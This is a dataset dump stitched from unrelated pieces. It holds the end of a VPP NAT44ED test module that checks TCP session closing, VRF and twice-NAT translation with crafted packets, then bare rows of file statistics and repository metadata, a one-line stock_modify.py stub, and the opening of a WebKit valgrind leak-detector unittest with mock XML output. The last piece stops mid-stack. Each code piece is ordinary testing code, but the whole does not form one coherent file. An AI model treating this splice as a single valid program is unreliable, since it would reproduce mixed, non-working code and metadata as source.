    sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
    self.assertEqual(len(sessions) - session_n, 0)
def test_tcp_session_close_simultaneous(self):
    """ NAT44ED Close TCP session - simultaneous close (FIN both ways) """
    in_port = self.tcp_port_in
    ext_port = 10505
    self.nat_add_address(self.nat_addr)
    self.nat_add_inside_interface(self.pg0)
    self.nat_add_outside_interface(self.pg1)
    # static twice-NAT mapping for the inside host's service port
    self.nat_add_static_mapping(self.pg0.remote_ip4, self.nat_addr,
                                in_port, ext_port, proto=IP_PROTOS.tcp,
                                flags=self.config_flags.NAT_IS_TWICE_NAT)
    # baseline session count so the assertions below can be relative
    sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
    session_n = len(sessions)
    # short (2s) transitory timeout lets the closed session age out fast
    self.vapi.nat_set_timeouts(udp=300, tcp_established=7440,
                               tcp_transitory=2, icmp=5)
    out_port = self.init_tcp_session(self.pg0, self.pg1, in_port, ext_port)
    # FIN packet in -> out
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=in_port, dport=ext_port,
             flags="FA", seq=100, ack=300))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg1.get_capture(1)
    # FIN packet out -> in; ack=100 does not yet acknowledge the peer's
    # FIN (that would be ack=101), i.e. both sides close simultaneously
    p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
         TCP(sport=ext_port, dport=out_port,
             flags="FA", seq=300, ack=100))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg0.get_capture(1)
    # ACK packet in -> out
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=in_port, dport=ext_port,
             flags="A", seq=101, ack=301))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg1.get_capture(1)
    # ACK packet out -> in
    p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
         TCP(sport=ext_port, dport=out_port,
             flags="A", seq=301, ack=101))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg0.get_capture(1)
    # session is closed but must still exist until the transitory timeout
    sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
    self.assertEqual(len(sessions) - session_n, 1)
    out2in_drops = self.get_err_counter(
        '/err/nat44-ed-out2in/drops due to TCP in transitory timeout')
    in2out_drops = self.get_err_counter(
        '/err/nat44-ed-in2out/drops due to TCP in transitory timeout')
    # extra FIN packet out -> in - this should be dropped
    p = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
         IP(src=self.pg1.remote_ip4, dst=self.nat_addr) /
         TCP(sport=ext_port, dport=out_port,
             flags="FA", seq=300, ack=101))
    self.pg1.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg0.assert_nothing_captured()
    # extra ACK packet in -> out - this should be dropped
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=in_port, dport=ext_port,
             flags="A", seq=101, ack=301))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg1.assert_nothing_captured()
    # each dropped packet must bump its direction's drop counter by one
    stats = self.get_err_counter(
        '/err/nat44-ed-out2in/drops due to TCP in transitory timeout')
    self.assertEqual(stats - out2in_drops, 1)
    stats = self.get_err_counter(
        '/err/nat44-ed-in2out/drops due to TCP in transitory timeout')
    self.assertEqual(stats - in2out_drops, 1)
    # wait past the 2s transitory timeout configured above
    self.sleep(3)
    # extra ACK packet in -> out - this will cause session to be wiped
    p = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
         IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=in_port, dport=ext_port,
             flags="A", seq=101, ack=301))
    self.pg0.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    self.pg1.assert_nothing_captured()
    # session count must be back to the baseline
    sessions = self.vapi.nat44_user_session_dump(self.pg0.remote_ip4, 0)
    self.assertEqual(len(sessions) - session_n, 0)
def test_dynamic_vrf(self):
    """ NAT44ED dynamic translation test: different VRF"""
    inside_vrf = 33
    outside_vrf = 34
    self.nat_add_address(self.nat_addr, vrf_id=inside_vrf)
    try:
        # put the inside and outside interfaces into separate tables
        self.configure_ip4_interface(self.pg7, table_id=inside_vrf)
        self.configure_ip4_interface(self.pg8, table_id=outside_vrf)
        self.nat_add_inside_interface(self.pg7)
        self.nat_add_outside_interface(self.pg8)
        # just basic stuff nothing special
        stream = self.create_stream_in(self.pg7, self.pg8)
        self.pg7.add_stream(stream)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        rx = self.pg8.get_capture(len(stream))
        self.verify_capture_out(rx, ignore_port=True)
        stream = self.create_stream_out(self.pg8)
        self.pg8.add_stream(stream)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        rx = self.pg7.get_capture(len(stream))
        self.verify_capture_in(rx, self.pg7)
    finally:
        # always undo interface/table config, even on test failure
        self.pg7.unconfig()
        self.pg8.unconfig()
        for table_id in (inside_vrf, outside_vrf):
            self.vapi.ip_table_add_del(is_add=0,
                                       table={'table_id': table_id})
def test_dynamic_output_feature_vrf(self):
    """ NAT44ED dynamic translation test: output-feature, VRF"""
    # other then default (0)
    new_vrf_id = 22
    self.nat_add_address(self.nat_addr)
    self.vapi.nat44_interface_add_del_output_feature(
        sw_if_index=self.pg8.sw_if_index, is_add=1)
    try:
        self.configure_ip4_interface(self.pg7, table_id=new_vrf_id)
        self.configure_ip4_interface(self.pg8, table_id=new_vrf_id)

        def counter_sums(prefix):
            # snapshot the per-protocol counter sums for pg8
            idx = self.pg8.sw_if_index
            return {name: self.statistics[prefix + name][:, idx].sum()
                    for name in ('tcp', 'udp', 'icmp', 'drops')}

        expected_deltas = (('tcp', 2), ('udp', 1), ('icmp', 1),
                           ('drops', 0))
        # in2out (session creation goes through the slowpath)
        before = counter_sums('/nat44-ed/in2out/slowpath/')
        stream = self.create_stream_in(self.pg7, self.pg8)
        self.pg7.add_stream(stream)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        rx = self.pg8.get_capture(len(stream))
        self.verify_capture_out(rx, ignore_port=True)
        after = counter_sums('/nat44-ed/in2out/slowpath/')
        for name, delta in expected_deltas:
            self.assertEqual(after[name] - before[name], delta)
        # out2in (existing sessions take the fastpath)
        before = counter_sums('/nat44-ed/out2in/fastpath/')
        stream = self.create_stream_out(self.pg8)
        self.pg8.add_stream(stream)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        rx = self.pg7.get_capture(len(stream))
        self.verify_capture_in(rx, self.pg7)
        after = counter_sums('/nat44-ed/out2in/fastpath/')
        for name, delta in expected_deltas:
            self.assertEqual(after[name] - before[name], delta)
        sessions = self.statistics['/nat44-ed/total-sessions']
        self.assertEqual(sessions[:, 0].sum(), 3)
    finally:
        # always undo interface/table config, even on test failure
        self.pg7.unconfig()
        self.pg8.unconfig()
        self.vapi.ip_table_add_del(is_add=0,
                                   table={'table_id': new_vrf_id})
def test_next_src_nat(self):
    """ NAT44ED On way back forward packet to nat44-in2out node. """
    twice_nat_addr = '10.0.1.3'
    external_port = 80
    local_port = 8080
    post_twice_nat_port = 0
    self.vapi.nat44_forwarding_enable_disable(enable=1)
    self.nat_add_address(twice_nat_addr, twice_nat=1)
    # out2in-only + self-twice-NAT rule: traffic from pg6's host to the
    # external address hairpins back to the same host
    flags = (self.config_flags.NAT_IS_OUT2IN_ONLY |
             self.config_flags.NAT_IS_SELF_TWICE_NAT)
    self.nat_add_static_mapping(self.pg6.remote_ip4, self.pg1.remote_ip4,
                                local_port, external_port,
                                proto=IP_PROTOS.tcp, vrf_id=1,
                                flags=flags)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg6.sw_if_index,
        is_add=1)
    # client -> service: destination rewritten to local host/port,
    # source twice-NATed to twice_nat_addr with a new port
    p = (Ether(src=self.pg6.remote_mac, dst=self.pg6.local_mac) /
         IP(src=self.pg6.remote_ip4, dst=self.pg1.remote_ip4) /
         TCP(sport=12345, dport=external_port))
    self.pg6.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg6.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, twice_nat_addr)
        self.assertNotEqual(tcp.sport, 12345)
        post_twice_nat_port = tcp.sport
        self.assertEqual(ip.dst, self.pg6.remote_ip4)
        self.assertEqual(tcp.dport, local_port)
        self.assert_packet_checksums_valid(p)
    except Exception:
        # narrowed from bare 'except:' so KeyboardInterrupt/SystemExit
        # are not misreported as packet errors; still log and re-raise
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise
    # service -> client: both translations must be undone on the way back
    p = (Ether(src=self.pg6.remote_mac, dst=self.pg6.local_mac) /
         IP(src=self.pg6.remote_ip4, dst=twice_nat_addr) /
         TCP(sport=local_port, dport=post_twice_nat_port))
    self.pg6.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg6.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, self.pg1.remote_ip4)
        self.assertEqual(tcp.sport, external_port)
        self.assertEqual(ip.dst, self.pg6.remote_ip4)
        self.assertEqual(tcp.dport, 12345)
        self.assert_packet_checksums_valid(p)
    except Exception:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise
def test_one_armed_nat44_static(self):
    """ NAT44ED One armed NAT and 1:1 NAPT asymmetrical rule """
    remote_host = self.pg4.remote_hosts[0]
    local_host = self.pg4.remote_hosts[1]
    external_port = 80
    local_port = 8080
    eh_port_in = 0
    self.vapi.nat44_forwarding_enable_disable(enable=1)
    self.nat_add_address(self.nat_addr, twice_nat=1)
    # asymmetric (out2in-only) 1:1 NAPT rule with twice-NAT source rewrite
    flags = (self.config_flags.NAT_IS_OUT2IN_ONLY |
             self.config_flags.NAT_IS_TWICE_NAT)
    self.nat_add_static_mapping(local_host.ip4, self.nat_addr,
                                local_port, external_port,
                                proto=IP_PROTOS.tcp, flags=flags)
    # one-armed setup: pg4 acts as both outside and inside interface
    flags = self.config_flags.NAT_IS_INSIDE
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg4.sw_if_index,
        is_add=1)
    self.vapi.nat44_interface_add_del_feature(
        sw_if_index=self.pg4.sw_if_index,
        flags=flags, is_add=1)
    # from client to service
    p = (Ether(src=self.pg4.remote_mac, dst=self.pg4.local_mac) /
         IP(src=remote_host.ip4, dst=self.nat_addr) /
         TCP(sport=12345, dport=external_port))
    self.pg4.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg4.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.dst, local_host.ip4)
        self.assertEqual(ip.src, self.nat_addr)
        self.assertEqual(tcp.dport, local_port)
        # twice-NAT must have allocated a fresh source port
        self.assertNotEqual(tcp.sport, 12345)
        eh_port_in = tcp.sport
        self.assert_packet_checksums_valid(p)
    except Exception:
        # narrowed from bare 'except:' so KeyboardInterrupt/SystemExit
        # are not misreported as packet errors; still log and re-raise
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise
    # from service back to client
    p = (Ether(src=self.pg4.remote_mac, dst=self.pg4.local_mac) /
         IP(src=local_host.ip4, dst=self.nat_addr) /
         TCP(sport=local_port, dport=eh_port_in))
    self.pg4.add_stream(p)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    capture = self.pg4.get_capture(1)
    p = capture[0]
    try:
        ip = p[IP]
        tcp = p[TCP]
        self.assertEqual(ip.src, self.nat_addr)
        self.assertEqual(ip.dst, remote_host.ip4)
        self.assertEqual(tcp.sport, external_port)
        self.assertEqual(tcp.dport, 12345)
        self.assert_packet_checksums_valid(p)
    except Exception:
        self.logger.error(ppp("Unexpected or invalid packet:", p))
        raise
def test_icmp_error_fwd_outbound(self):
    """ NAT44ED ICMP error outbound with forwarding enabled """
    # Ensure that an outbound ICMP error message is properly associated
    # with the inbound forward bypass session it is related to.
    payload = "H" * 10
    self.nat_add_address(self.nat_addr)
    self.nat_add_inside_interface(self.pg0)
    self.nat_add_outside_interface(self.pg1)
    # enable forwarding and initiate connection out2in
    self.vapi.nat44_forwarding_enable_disable(enable=1)
    p1 = (Ether(src=self.pg1.remote_mac, dst=self.pg1.local_mac) /
          IP(src=self.pg1.remote_ip4, dst=self.pg0.remote_ip4) /
          UDP(sport=21, dport=20) / payload)
    self.pg1.add_stream(p1)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    forwarded = self.pg0.get_capture(1)[0]
    self.logger.info(self.vapi.cli("show nat44 sessions"))
    # reply with ICMP error message in2out, embedding the packet that
    # arrived on pg0 so the error maps onto the bypass session.
    # We cannot reliably retrieve forward bypass sessions via the API.
    # session dumps for a user will only look on the worker that the
    # user is supposed to be mapped to in2out. The forward bypass session
    # is not necessarily created on that worker.
    p2 = (Ether(src=self.pg0.remote_mac, dst=self.pg0.local_mac) /
          IP(src=self.pg0.remote_ip4, dst=self.pg1.remote_ip4) /
          ICMP(type='dest-unreach', code='port-unreachable') /
          forwarded[IP:])
    self.pg0.add_stream(p2)
    self.pg_enable_capture(self.pg_interfaces)
    self.pg_start()
    # the ICMP error must make it out on pg1; log everything for triage
    rx = self.pg1.get_capture(1)[0]
    self.logger.info(self.vapi.cli("show nat44 sessions"))
    self.logger.info(ppp("p1 packet:", p1))
    self.logger.info(ppp("p2 packet:", p2))
    self.logger.info(ppp("capture packet:", rx))
# Allow running this test module directly via VPP's test runner.
if __name__ == '__main__':
    unittest.main(testRunner=VppTestRunner)
| 39.698413
| 79
| 0.5728
| 19,744
| 152,561
| 4.176357
| 0.03206
| 0.03506
| 0.026013
| 0.029724
| 0.856448
| 0.82334
| 0.79364
| 0.769798
| 0.749218
| 0.729086
| 0
| 0.034971
| 0.32505
| 152,561
| 3,842
| 80
| 39.708745
| 0.765818
| 0.047791
| 0
| 0.757297
| 0
| 0
| 0.031417
| 0.010249
| 0
| 0
| 0.000691
| 0
| 0.101206
| 1
| 0.027284
| false
| 0
| 0.005076
| 0.001904
| 0.041244
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4c251fa72df00bc11c03cff7feed4e410bf14bb0
| 30
|
py
|
Python
|
frontend/stock/stock_modify.py
|
Tasari/Restaurant_system
|
bc0127e0060c54c17abb7aa78800da7bd5bc12cb
|
[
"MIT"
] | null | null | null |
frontend/stock/stock_modify.py
|
Tasari/Restaurant_system
|
bc0127e0060c54c17abb7aa78800da7bd5bc12cb
|
[
"MIT"
] | null | null | null |
frontend/stock/stock_modify.py
|
Tasari/Restaurant_system
|
bc0127e0060c54c17abb7aa78800da7bd5bc12cb
|
[
"MIT"
] | null | null | null |
def stock_modify():
    """Placeholder for the stock-modification action; currently a no-op."""
    return None
| 15
| 19
| 0.7
| 4
| 30
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 30
| 2
| 20
| 15
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
4c4797bc6acf3cdb4c896f0becfcb312dfa3df9c
| 44,003
|
py
|
Python
|
Tools/Scripts/webkitpy/port/leakdetector_valgrind_unittest.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | 6
|
2021-07-05T16:09:39.000Z
|
2022-03-06T22:44:42.000Z
|
Tools/Scripts/webkitpy/port/leakdetector_valgrind_unittest.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | 7
|
2022-03-15T13:25:39.000Z
|
2022-03-15T13:25:44.000Z
|
Tools/Scripts/webkitpy/port/leakdetector_valgrind_unittest.py
|
jacadcaps/webkitty
|
9aebd2081349f9a7b5d168673c6f676a1450a66d
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (C) 2013 Samsung Electronics. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
from webkitcorepy import string_utils
from webkitpy.common.system.executive_mock import MockExecutive2
from webkitpy.common.system.filesystem_mock import MockFileSystem
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.port.leakdetector_valgrind import LeakDetectorValgrind
def make_mock_valgrind_output(process_name, pid, uuid):
return """<?xml version="1.0"?>
<valgrindoutput>
<protocolversion>4</protocolversion>
<protocoltool>memcheck</protocoltool>
<preamble>
<line>Memcheck, a memory error detector</line>
<line>Copyright (C) 2002-2011, and GNU GPL'd, by Julian Seward et al.</line>
<line>Using Valgrind-3.7.0 and LibVEX; rerun with -h for copyright info</line>
<line>Command: /home/user/WebKit/WebKitBuild/Release/Programs/{process_name} -</line>
</preamble>
<pid>{pid}</pid>
<ppid>18577</ppid>
<tool>memcheck</tool>
<args>
<vargv>
<exe>/usr/bin/valgrind.bin</exe>
<arg>--tool=memcheck</arg>
<arg>--num-callers=40</arg>
<arg>--demangle=no</arg>
<arg>--trace-children=no</arg>
<arg>--smc-check=all-non-file</arg>
<arg>--leak-check=yes</arg>
<arg>--leak-resolution=high</arg>
<arg>--show-possibly-lost=no</arg>
<arg>--show-reachable=no</arg>
<arg>--leak-check=full</arg>
<arg>--undef-value-errors=no</arg>
<arg>--gen-suppressions=all</arg>
<arg>--xml=yes</arg>
<arg>--xml-file=/home/user/WebKit/WebKitBuild/Release/layout-test-results/drt-{pid}-{uuid}-leaks.xml</arg>
<arg>--suppressions=/home/user/WebKit/Tools/Scripts/valgrind/suppressions.txt</arg>
<arg>--suppressions=/usr/lib/valgrind/debian-libc6-dbg.supp</arg>
</vargv>
<argv>
<exe>/home/user/WebKit/WebKitBuild/Release/Programs/{process_name}</exe>
<arg>-</arg>
</argv>
</args>
<status>
<state>RUNNING</state>
<time>00:00:00:00.024 </time>
</status>
<status>
<state>FINISHED</state>
<time>00:00:00:54.186 </time>
</status>
<error>
<unique>0x1a4</unique>
<tid>1</tid>
<kind>Leak_DefinitelyLost</kind>
<xwhat>
<text>8 bytes in 1 blocks are definitely lost in loss record 421 of 7,972</text>
<leakedbytes>8</leakedbytes>
<leakedblocks>1</leakedblocks>
</xwhat>
<stack>
<frame>
<ip>0x4C2AF8E</ip>
<obj>/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so</obj>
<fn>_Znwm</fn>
</frame>
<frame>
<ip>0x6839DEC</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation</fn>
</frame>
<frame>
<ip>0x61E7B03</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>webkit_web_policy_decision_new</fn>
</frame>
<frame>
<ip>0x61CBA6D</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE</fn>
</frame>
<frame>
<ip>0x683DF52</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_</fn>
</frame>
<frame>
<ip>0x6817EFC</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE</fn>
</frame>
<frame>
<ip>0x6818729</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE</fn>
</frame>
<frame>
<ip>0x6818A3A</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE</fn>
</frame>
<frame>
<ip>0x61E3148</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>webkit_web_frame_load_uri</fn>
</frame>
<frame>
<ip>0x44CBC9</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>_ZL7runTestRKSs</fn>
</frame>
<frame>
<ip>0x44CED6</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>_ZL20runTestingServerLoopv</fn>
</frame>
<frame>
<ip>0x43A2D3</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/Programs/DumpRenderTree</obj>
<fn>main</fn>
</frame>
</stack>
<suppression>
<sname>insert_a_suppression_name_here</sname>
<skind>Memcheck:Leak</skind>
<sframe> <fun>_Znwm</fun> </sframe>
<sframe> <fun>_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation</fun> </sframe>
<sframe> <fun>webkit_web_policy_decision_new</fun> </sframe>
<sframe> <fun>_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE</fun> </sframe>
<sframe> <fun>_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_</fun> </sframe>
<sframe> <fun>_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE</fun> </sframe>
<sframe> <fun>_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE</fun> </sframe>
<sframe> <fun>_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE</fun> </sframe>
<sframe> <fun>webkit_web_frame_load_uri</fun> </sframe>
<sframe> <fun>_ZL7runTestRKSs</fun> </sframe>
<sframe> <fun>_ZL20runTestingServerLoopv</fun> </sframe>
<sframe> <fun>main</fun> </sframe>
<rawtext>
<![CDATA[
{{
<insert_a_suppression_name_here>
Memcheck:Leak
fun:_Znwm
fun:_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS1_15ResourceRequestEPNS1_14DocumentLoaderEN3WTF10PassRefPtrINS1_9FormStateEEEPFvPvS5_SB_bESC_EUlNS1_12PolicyActionEE_E10_M_managerERSt9_Any_dataRKSI_St18_Manager_operation
fun:webkit_web_policy_decision_new
fun:_ZN6WebKit17FrameLoaderClient39dispatchDecidePolicyForNavigationActionERKN7WebCore16NavigationActionERKNS1_15ResourceRequestEN3WTF10PassRefPtrINS1_9FormStateEEESt8functionIFvNS1_12PolicyActionEEE
fun:_ZN7WebCore13PolicyChecker21checkNavigationPolicyERKNS_15ResourceRequestEPNS_14DocumentLoaderEN3WTF10PassRefPtrINS_9FormStateEEEPFvPvS3_S9_bESA_
fun:_ZN7WebCore11FrameLoader22loadWithDocumentLoaderEPNS_14DocumentLoaderENS_13FrameLoadTypeEN3WTF10PassRefPtrINS_9FormStateEEE
fun:_ZN7WebCore11FrameLoader4loadEPNS_14DocumentLoaderE
fun:_ZN7WebCore11FrameLoader4loadERKNS_16FrameLoadRequestE
fun:webkit_web_frame_load_uri
fun:_ZL7runTestRKSs
fun:_ZL20runTestingServerLoopv
fun:main
}}
]]>
</rawtext>
</suppression>
</error>
<error>
<unique>0x1a5</unique>
<tid>1</tid>
<kind>Leak_DefinitelyLost</kind>
<xwhat>
<text>8 bytes in 1 blocks are definitely lost in loss record 422 of 7,972</text>
<leakedbytes>8</leakedbytes>
<leakedblocks>1</leakedblocks>
</xwhat>
<stack>
<frame>
<ip>0x4C2AF8E</ip>
<obj>/usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so</obj>
<fn>_Znwm</fn>
</frame>
<frame>
<ip>0x6839D0C</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZNSt14_Function_base13_Base_managerIZN7WebCore13PolicyChecker18checkContentPolicyERKNS1_16ResourceResponseEPFvPvNS1_12PolicyActionEES6_EUlS7_E_E10_M_managerERSt9_Any_dataRKSC_St18_Manager_operation</fn>
</frame>
<frame>
<ip>0x61E7B03</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>webkit_web_policy_decision_new</fn>
</frame>
<frame>
<ip>0x61CB527</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN6WebKit17FrameLoaderClient31dispatchDecidePolicyForResponseERKN7WebCore16ResourceResponseERKNS1_15ResourceRequestESt8functionIFvNS1_12PolicyActionEEE</fn>
</frame>
<frame>
<ip>0x6839EC0</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore13PolicyChecker18checkContentPolicyERKNS_16ResourceResponseEPFvPvNS_12PolicyActionEES4_</fn>
</frame>
<frame>
<ip>0x6802F6E</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore14DocumentLoader16responseReceivedEPNS_14CachedResourceERKNS_16ResourceResponseE</fn>
</frame>
<frame>
<ip>0x67E59E0</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore17CachedRawResource16responseReceivedERKNS_16ResourceResponseE</fn>
</frame>
<frame>
<ip>0x684C237</ip>
<obj>/home/user/WebKit/WebKitBuild/Release/.libs/libwebkitgtk-3.0.so.0.19.3</obj>
<fn>_ZN7WebCore17SubresourceLoader18didReceiveResponseERKNS_16ResourceResponseE</fn>
